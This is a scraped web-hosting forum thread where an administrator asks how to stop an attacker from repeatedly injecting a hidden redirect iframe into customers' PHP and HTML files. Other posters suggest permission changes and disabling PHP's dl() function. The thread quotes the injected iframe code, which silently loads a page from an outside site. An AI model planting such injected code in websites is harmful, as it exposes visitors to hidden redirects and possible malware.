var sidebar_align = 'right';
var content_container_margin = parseInt('350px');
var sidebar_width = parseInt('330px');
redirector code is getting added
I need your help asap. For last few days I have got complaints from my hosting customer that some one is adding the below redirector code to their header.php, index.html file and when they go on their site, it directs on the url.
<iframe name="StatPage" src="http://doggystyles.net/fix.php" width=5
My servers are very secured from the server end but it seems this may be happening due to some php security issues. The server is a shared hosting server and runs cpanel.
I also tried to do : chattr +i filename but the files can still be edited by the hacker.
Any of your input will be much appriciated.
You should check that redirection is most likely in httpd.conf or a .httaccess file so you should check there.
Also check if the folder is writeable and a index.html is added to avoid editing, set permissions to 444 or 555 depending on your server config.
If you need some more optimization tips you can have a look at
I know which file it is adding the code, but my question was how to stop it.
it seems it may be happening due to some php security issues. How can I secure php, so no once can write thru a php shell.
The server is very much secured at the OS level i.e ssh, apf,bdf, httpd, rkhunter, secure tmp etc ..
Isn't this a dl module that is being added, like a flame.so attack?
this code gets added to index.php, index.html, header.php file.
<iframe name="StatPage" src="http://doggystyles.net/fix.php" width=5 height=5 style="display:none"></iframe>
how can I stop this from happening again.
Originally Posted by
"how can I stop this from happening again."
If it's a dl module, check your php.ini file for this section:
; Whether or not to enable the dl() function. The dl() function does NOT work
; properly in multithreaded servers, such as IIS or Zeus, and is automatically
; disabled on them.
enable_dl = On
If it's set to 'On', change it to 'Off'. Then, restart Apache for it to take effect.
If you don't know where your php.ini file is, run 'whereis php.ini' to find it.
A more accurate way of finding your php.ini would be: